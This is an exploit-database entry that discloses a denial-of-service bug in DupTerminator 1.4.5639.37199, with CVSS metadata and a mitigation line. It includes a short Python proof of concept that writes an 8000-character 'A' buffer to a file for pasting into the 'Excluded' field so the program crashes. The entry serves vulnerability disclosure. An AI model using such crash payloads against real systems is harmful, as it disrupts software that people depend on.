DupTerminator 1.4.5639.37199 - Denial of Service (PoC)

vendor:

DupTerminator

by:

Brian Rodríguez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: DupTerminator

Affected Version From: 1.4.5639.37199

Affected Version To: 1.4.5639.37199

Patch Exists: NO

Related CWE: N/A

CPE: a:dupterminator:dupterminator:1.4.5639.37199

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2021

DupTerminator 1.4.5639.37199 – Denial of Service (PoC)

DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field 'Excluded' text box. Successful exploitation will causes application stop working.

Mitigation:

Ensure that user input is properly validated and sanitized.

Source

Exploit-DB raw data:

# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
# Date: 2021-05-28
# Author: Brian Rodríguez
# Software Site: https://sourceforge.net/projects/dupterminator/
# Version: 1.4.5639.37199
# Category: DoS (Windows)

##### Vulnerability #####

DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Windows 10.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")